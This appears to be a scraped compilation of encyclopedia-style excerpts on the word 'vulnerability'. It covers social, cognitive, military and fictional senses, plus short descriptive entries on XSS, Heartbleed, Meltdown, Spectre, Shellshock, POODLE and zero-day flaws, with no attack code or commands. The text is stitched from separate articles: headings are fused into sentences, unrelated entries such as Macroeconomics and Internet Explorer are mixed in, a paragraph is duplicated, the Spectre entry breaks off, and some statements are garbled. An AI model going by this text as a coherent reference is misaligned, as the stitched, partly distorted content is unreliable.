Vulnerability refers to the inability (of a system or a unit) to withstand the effects of a hostile environment. A window of vulnerability (WOV) is a time frame within which defensive measures are diminished, compromised or lacking.
The understanding of social and environmental vulnerability, as a methodological approach, involves the analysis of the risks and assets of disadvantaged groups, such as the elderly. The approach of vulnerability in itself brings great expectations of social policy and gerontological planning.
In relation to hazards and disasters, vulnerability is a concept that links the relationship that people have with their environment to social forces and institutions and the cultural values that sustain and contest them. “The concept of vulnerability expresses the multi-dimensionality of disasters by focusing attention on the totality of relationships in a given social situation which constitute a condition that, in combination with environmental forces, produces a disaster”.
It is also the extent to which changes could harm a system, or to which the community can be affected by the impact of a hazard or exposed to the possibility of being attacked or harmed, either physically or emotionally: "we were in a vulnerable position".
Within the body of literature related to vulnerability, major research streams include questions of methodology, such as: measuring and assessing vulnerability, including finding appropriate indicators for various aspects of vulnerability, up- and down scaling methods, and participatory methods. Vulnerability research covers a complex, multidisciplinary field including development and poverty studies, public health, climate studies, security studies, engineering, geography, political ecology, and disaster risk management . This research is of importance and interest for organizations trying to reduce vulnerability – especially as related to poverty and other Millennium Development Goals. Many institutions are conducting interdisciplinary research on vulnerability. A forum that brings many of the current researchers on vulnerability together is the Expert Working Group (EWG). Researchers are currently working to refine definitions of “vulnerability”, measurement and assessment methods, and effective communication of research to decision makers.
In its sense, social vulnerability is one dimension of vulnerability to multiple stressors (agent responsible for stress) and shocks, including abuse, social exclusion and natural hazards. Social vulnerability refers to the inability of people, organizations, and societies to withstand adverse impacts from multiple stressors to which they are exposed. These impacts are due in part to characteristics inherent in social interactions, institutions, and systems of cultural values.
In this respect, there is a need to place an increased emphasis on assets and entitlements for understanding ‘catastrophe’ as opposed to solely the strength or severity of shocks.
A cognitive vulnerability, in cognitive psychology, is an erroneous belief, cognitive bias, or pattern of thought that is believed to predispose the individual to psychological problems. It is in place before the symptoms of psychological disorders start to appear, such as high neuroticism, and after the individual encounters a stressful experience, the cognitive vulnerability shapes a maladaptive response that may lead to a psychological disorder. In psychopathology, cognitive vulnerability is constructed from schema models, hopelessness models, and attachment theory. Attentional bias is one mechanism leading to faulty cognitive bias that leads to cognitive vulnerability. Allocating a danger level to a threat depends on the urgency or intensity of the threshold. Anxiety is not associated with selective orientation.
In military terminology, vulnerability is a subset of survivability, the others being susceptibility and recoverability. Vulnerability is defined in various ways depending on the nation and service arm concerned, but in general it refers to the near-instantaneous effects of a weapon attack. In aviation it is defined as the inability of an aircraft to withstand the damage caused by the man-made hostile environment. In some definitions, recoverability (damage control, firefighting, restoration of capability) is included in vulnerability. Some military services develop their own concept of vulnerability.
Invulnerability is a common feature found in science fiction and fantasy, in particular in superhero fiction, as depicted commonly in novels, comic books and video games. In such stories, it is a quality that makes a character impervious to pain, damage or loss of health.
In video games, it can be found in the form of "power-ups" or cheats; when activated via cheats, it is often referred to as "god mode". Generally, it does not protect the player from certain instant-death hazards, most notably "bottomless" pits from which, even if the player were to survive the fall, they would be unable to escape. As a rule, invulnerability granted by power-ups is temporary, and wears off after a set amount of time, while invulnerability cheats, once activated, remain in effect until deactivated, or the end of the level is reached. Depending on the game in question, invulnerability to damage may or may not protect the player from non-damage effects, such as being immobilized or sent flying.
In comic books, some superheroes are considered invulnerable, though this usually only applies up to a certain level (e.g. Superman is invulnerable to physical attacks from normal people but not to the extremely powerful attacks of Doomsday or those at his level or higher). In the manga, webcomic and anime series One-Punch Man, for example, the main protagonist Saitama is completely immune to all kinds of attacks, whether it be blunt attacks, environmental-based attacks (like heat or cold), slashing attacks or pressure-point based attacks, and unharmed by physical laws.
In mythology, talismans, charms, and amulets were created by magic users for the purpose of making the wearer immune to injury from both mystic and mundane weapons.
Application security encompasses measures taken to improve the security of an application often by finding, fixing and preventing security vulnerabilities.
Different techniques are used to surface such security vulnerabilities at different stages of an applications lifecycle such as design, development, deployment, upgrade, maintenance.
An always evolving but largely consistent set of common security flaws are seen across different applications, see common flawsCross-site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. In 2017, XSS is still considered a major threat vector. XSS effects vary in
range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.Disaster
A disaster is a serious disruption, occurring over a relatively short time, of the functioning of a community or a society involving widespread human, material, economic or environmental loss and impacts, which exceeds the ability of the affected community or society to cope using its own resources.In contemporary academia, disasters are seen as the consequence of inappropriately managed risk. These risks are the product of a combination of both hazards and vulnerability. Hazards that strike in areas with low vulnerability will never become disasters, as in the case of uninhabited regions.Developing countries suffer the greatest costs when a disaster hits – more than 95 percent of all deaths caused by hazards occur in developing countries, and losses due to natural hazards are 20 times greater (as a percentage of GDP) in developing countries than in industrialized countries.Exploit (computer security)
An exploit (from the English verb to exploit, meaning "to use something to one’s own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service (DoS or related DDoS) attack.Foreshadow (security vulnerability)
Foreshadow (known as L1 Terminal Fault (L1TF) by Intel) is a vulnerability that affects modern microprocessors that was first discovered by two independent teams of researchers in January 2018, but was first disclosed to the public on 14 August 2018. The vulnerability is a speculative execution attack on Intel processors that may result in the disclosure of sensitive information stored in personal computers and third-party clouds. There are two versions: the first version (original/Foreshadow) (CVE-2018-3615) targets data from SGX enclaves; and the second version (next-generation/Foreshadow-NG) (CVE-2018-3620 and CVE-2018-3646) targets virtual machines (VMs), hypervisors (VMM), operating systems (OS) kernel memory, and System Management Mode (SMM) memory. A listing of affected Intel hardware has been posted.Foreshadow is similar to the Spectre security vulnerabilities discovered earlier to affect Intel and AMD chips, and the Meltdown vulnerability that also affected Intel. However, AMD products, according to AMD, are not affected by the Foreshadow security flaws. According to one expert, "[Foreshadow] lets malicious software break into secure areas that even the Spectre and Meltdown flaws couldn't crack". Nonetheless, one of the variants of Foreshadow goes beyond Intel chips with SGX technology, and affects "all [Intel] Core processors built over the last seven years".Foreshadow may be very difficult to exploit, and there seems to be no evidence to date (15 August 2018) of any serious hacking involving the Foreshadow vulnerabilities. Nevertheless, applying software patches may help alleviate some concern(s), although the balance between security and performance may be a worthy consideration. Companies performing cloud computing may see a significant decrease in their overall computing power; individuals, however, may not likely see any performance impact, according to researchers. The real fix, according to Intel, is by replacing today's processors. Intel further states, "These changes begin with our next-generation Intel Xeon Scalable processors (code-named Cascade Lake), as well as new client processors expected to launch later this year ."On 16 August 2018, researchers presented technical details of the Foreshadow security vulnerabilities in a seminar, and publication, entitled "Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution" at a USENIX security conference.Full disclosure (computer security)
In the field of computer security, independent researchers often discover flaws in software that can be abused to cause unintended behaviour; these flaws are called vulnerabilities. The process by which the analysis of these vulnerabilities is shared with third parties is the subject of much debate, and is referred to as the researcher's disclosure policy. Full disclosure is the practice of publishing analysis of software vulnerabilities as early as possible, making the data accessible to everyone without restriction. The primary purpose of widely disseminating information about vulnerabilities is so that potential victims are as knowledgeable as those who attack them.In his essay on the topic, Bruce Schneier stated "Full disclosure – the practice of making the details of security vulnerabilities public – is a damned good idea. Public scrutiny is the only reliable way to improve security, while secrecy only makes us less secure". Leonard Rose, co-creator of an electronic mailing list that has superseded bugtraq to become the de facto forum for disseminating advisories, explains "We don't believe in security by obscurity, and as far as we know, full disclosure is the only way to ensure that everyone, not just the insiders, have access to the information we need."Heartbleed
Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension. Thus, the bug's name derives from heartbeat. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed.Heartbleed is registered in the Common Vulnerabilities and Exposures database as CVE-2014-0160. The federal Canadian Cyber Incident Response Centre issued a security bulletin advising system administrators about the bug. A fixed version of OpenSSL was released on April 7, 2014, on the same day Heartbleed was publicly disclosed.As of May 20, 2014, 1.5% of the 800,000 most popular TLS-enabled websites were still vulnerable to Heartbleed.TLS implementations other than OpenSSL, such as GnuTLS, Mozilla's Network Security Services, and the Windows platform implementation of TLS, were not affected because the defect existed in the OpenSSL's implementation of TLS rather than in the protocol itself.Internet Explorer
Internet Explorer (formerly Microsoft Internet Explorer and currently Windows Internet Explorer, commonly referred to as Explorer and abbreviated IE or MSIE) is a series of graphical web browsers (or as of 2019, a "compatibility solution") developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 that year. Later versions were available as free downloads, or in service packs, and included in the original equipment manufacturer (OEM) service releases of Windows 95 and later versions of Windows. The browser is discontinued, but still maintained.Internet Explorer was once the most widely used web browser, attaining a peak of about 95% usage share by 2003. This came after Microsoft used bundling to win the first browser war against Netscape, which was the dominant browser in the 1990s. Its usage share has since declined with the launch of Firefox (2004) and Google Chrome (2008), and with the growing popularity of operating systems such as Android and iOS that do not run Internet Explorer. Estimates for Internet Explorer's market share are about 2.58% across all platforms or by StatCounter's numbers ranked 7th, while on desktop, the only platform it's ever had significant share (i.e., excluding mobile and Xbox) it's ranked 4th at 5.34%, just after macOS's Safari (others place IE 3rd with 4.79% after Firefox), as of February 2019 (browser market share is notoriously difficult to calculate). Microsoft spent over US$100 million per year on Internet Explorer in the late 1990s, with over 1,000 people involved in the project by 1999.Versions of Internet Explorer for other operating systems have also been produced, including an Xbox 360 version called Internet Explorer for Xbox and for platforms Microsoft no longer supports: Internet Explorer for Mac and Internet Explorer for UNIX (Solaris and HP-UX), and an embedded OEM version called Pocket Internet Explorer, later rebranded Internet Explorer Mobile made for Windows Phone, Windows CE, and previously, based on Internet Explorer 7 for Windows Mobile.
On March 17, 2015, Microsoft announced that Microsoft Edge would replace Internet Explorer as the default browser on its Windows 10 devices (while support for older Windows has since been announced, as of 2019 Edge still has lower share than IE's, that's in decline). This effectively makes Internet Explorer 11 the last release (however IE 8, 9, and 10 also receive security updates as of 2019). Internet Explorer, however, remains on Windows 10 and Windows Server 2019 primarily for enterprise purposes. Since January 12, 2016, only Internet Explorer 11 has been supported. Support varies based on the operating system's technical capabilities and its support lifecycle.The browser has been scrutinized throughout its development for use of third-party technology (such as the source code of Spyglass Mosaic, used without royalty in early versions) and security and privacy vulnerabilities, and the United States and the European Union have alleged that integration of Internet Explorer with Windows has been to the detriment of fair browser competition.Macroeconomics
Macroeconomics (from the Greek prefix makro- meaning "large" + economics) is a branch of economics dealing with the performance, structure, behavior, and decision-making of an economy as a whole. This includes regional, national, and global economies. Macroeconomists study aggregated indicators such as GDP, unemployment rates, national income, price indices, and the interrelations among the different sectors of the economy to better understand how the whole economy functions. They also develop models that explain the relationship between such factors as national income, output, consumption, unemployment, inflation, saving, investment, international trade, and international finance.
While macroeconomics is a broad field of study, there are two areas of research that are emblematic of the discipline: the attempt to understand the causes and consequences of short-run fluctuations in national income (the business cycle), and the attempt to understand the determinants of long-run economic growth (increases in national income). Macroeconomic models and their forecasts are used by governments to assist in the development and evaluation of economic policy.
Macroeconomics and microeconomics, a pair of terms coined by Ragnar Frisch, are the two most general fields in economics. In contrast to macroeconomics, microeconomics is the branch of economics that studies the behavior of individuals and firms in making decisions and the interactions among these individuals and firms in narrowly-defined markets.Meltdown (security vulnerability)
Meltdown is a hardware vulnerability affecting Intel x86 microprocessors, IBM POWER processors, and some ARM-based microprocessors. It allows a rogue process to read all memory, even when it is not authorized to do so.
Meltdown affects a wide range of systems. At the time of disclosure, this included all devices running any but the most recent and patched versions of iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs, printers and others), including a wide range of networking equipment.
A purely software workaround to Meltdown has been assessed as slowing computers between 5 and 30 percent in certain specialized workloads, although companies responsible for software correction of the exploit are reporting minimal impact from general benchmark testing.Meltdown was issued a Common Vulnerabilities and Exposures ID of CVE-2017-5754, also known as Rogue Data Cache Load (RDCL), in January 2018. It was disclosed in conjunction with another exploit, Spectre, with which it shares some, but not all characteristics. The Meltdown and Spectre vulnerabilities are considered "catastrophic" by security analysts. The vulnerabilities are so severe that, initially, security researchers believed the reports to be false.Several procedures to help protect home computers and related devices from the Meltdown and Spectre security vulnerabilities have been published. Meltdown patches may produce performance loss. Spectre patches have been reported to significantly reduce performance, especially on older computers; on the newer eighth-generation Core platforms, benchmark performance drops of 2–14 percent have been measured. On January 18, 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre patches, were reported. Nonetheless, according to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [January 26, 2018], though researchers have produced proof-of-concepts." Further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks and websites, not downloading files or applications from unknown sources ... following secure password protocols ... [using] security software to help protect against malware (advanced threat prevention software or anti-virus)."On January 25, 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented.On March 15, 2018, Intel reported that it will redesign its CPU processors (performance losses to be determined) to help protect against the Meltdown and related Spectre vulnerabilities (especially, Meltdown and Spectre-V2, but not Spectre-V1), and expects to release the newly redesigned processors later in 2018. On October 8, 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors.OpenSSL
OpenSSL is a software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end. It is widely used in Internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements basic cryptographic functions and provides various utility functions. Wrappers allowing the use of the OpenSSL library in a variety of computer languages are available.
The OpenSSL Software Foundation (OSF) represents the OpenSSL project in most legal capacities including contributor license agreements, managing donations, and so on. OpenSSL Software Services (OSS) also represents the OpenSSL project, for Support Contracts.
Versions are available for most Unix and Unix-like operating systems (including Solaris, Linux, macOS, QNX, and the various open-source BSD operating systems), OpenVMS and Microsoft Windows.POODLE
The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryption") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014" ). On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.The CVE-ID associated with the original POODLE attack is CVE-2014-3566.
F5 Networks filed for CVE-2014-8730 as well, see POODLE attack against TLS section below.Secure Shell
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH.
SSH provides a secure channel over an unsecured network in a client–server architecture, connecting an SSH client application with an SSH server. The protocol specification distinguishes between two major versions, referred to as SSH-1 and SSH-2. The standard TCP port for SSH is 22. SSH is generally used to access Unix-like operating systems, but it can also be used on Microsoft Windows. Windows 10 uses OpenSSH as its default SSH client.SSH was designed as a replacement for Telnet and for unsecured remote shell protocols such as the Berkeley rlogin, rsh, and rexec protocols. Those protocols send information, notably passwords, in plaintext, rendering them susceptible to interception and disclosure using packet analysis. The encryption used by SSH is intended to provide confidentiality and integrity of data over an unsecured network, such as the Internet, although files leaked by Edward Snowden indicate that the National Security Agency can sometimes decrypt SSH, allowing them to read the contents of SSH sessions.Shellshock (software bug)
Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.
on 12 September 2014, Stéphane Chazelas informed Bash's maintainer Chet Ramey of his discovery of the original bug, which he called "Bashdoor". Working with security experts, he developed a a patch (fix) which was was assigned the identifier CVE-2014-6271. The existence of the bug was announced to the public on 24 September 2014 when Bash updates with the fix were ready for distribution.The bug Chazelas discovered caused Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environment variables. Within days of its publication a variety of related vulnerabilities were discovered (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187). Ramey addressed these with a series of further patches.Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning. Security companies recorded millions of attacks and probes related to the bug in the days following the disclosure.Because of the potential to compromise millions of unpatched systems Shellshock was compared to the Heartbleed bug in its severity.Social vulnerability
In its broadest sense, social vulnerability is one dimension of vulnerability to multiple stressors and shocks, including abuse, social exclusion and natural hazards. Social vulnerability refers to the inability of people, organizations, and societies to withstand adverse impacts from multiple stressors to which they are exposed. These impacts are due in part to characteristics inherent in social interactions, institutions, and systems of cultural values.
Because it is most apparent when calamity occurs, many studies of social vulnerability are found in risk management literature.Spectre (security vulnerability)
Spectre is a vulnerability that affects modern microprocessors that perform branch prediction.
In computer security, a vulnerability is a weakness which can be exploited by a threat actor, such as an attacker, to perform unauthorized actions within a computer system.
To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.
Vulnerability management is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities. This practice generally refers to software vulnerabilities in computing systems.
A security risk is often incorrectly classified as a vulnerability. The use of vulnerability with the same meaning of risk can lead to confusion. The risk is the potential of a significant impact resulting from the exploit of a vulnerability. Then there are vulnerabilities without risk: for example when the affected asset has no value. A vulnerability with one or more known instances of working and fully implemented attacks is classified as an exploitable vulnerability—a vulnerability for which an exploit exists. The window of vulnerability is the time from when the security hole was introduced or manifested in deployed software, to when access was removed, a security fix was available/deployed, or the attacker was disabled—see zero-day attack.
Security bug (security defect) is a narrower concept: there are vulnerabilities that are not related to software: hardware, site, personnel vulnerabilities are examples of vulnerabilities that are not software security bugs.
Constructs in programming languages that are difficult to use properly can be a large source of vulnerabilities.Vulnerable species
A vulnerable species is one which has been categorized by the International Union for Conservation of Nature as likely to become endangered unless the circumstances that are threatening its survival and reproduction improve.
Vulnerability is mainly caused by habitat loss or destruction of the species home. Vulnerable habitat or species are monitored and can become increasingly threatened. Some species listed as "vulnerable" may be common in captivity, an example being the military macaw.
There are currently 5196 animals and 6789 plants classified as vulnerable, compared with 1998 levels of 2815 and 3222, respectively. Practices such as Cryoconservation of animal genetic resources have been enforced in efforts to conserve vulnerable breeds of livestock specifically.Zero-day (computing)
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). Until the vulnerability is mitigated, hackers can exploit it to adversely affect computer programs, data, additional computers or a network. An exploit directed at a zero-day is called a zero-day exploit, or zero-day attack.
In the jargon of computer security, "Day Zero" is the day on which the interested party (presumably the vendor of the targeted system) learns of the vulnerability. Up until that day, the vulnerability is known as a zero-day vulnerability. Similarly, an exploitable bug that has been known for thirty days would be called a 30-day vulnerability. Once the vendor learns of the vulnerability, the vendor will usually create patches or advise workarounds to mitigate it.The fewer the days since Day Zero, the higher the chance no fix or mitigation has been developed. Even after a fix is developed, the fewer the days since Day Zero, the higher is the probability that an attack against the afflicted software will be successful, because not every user of that software will have applied the fix. For zero-day exploits, the probability that a user has patched their bugs is zero, so the exploit should always succeed. Zero-day attacks are a severe threat.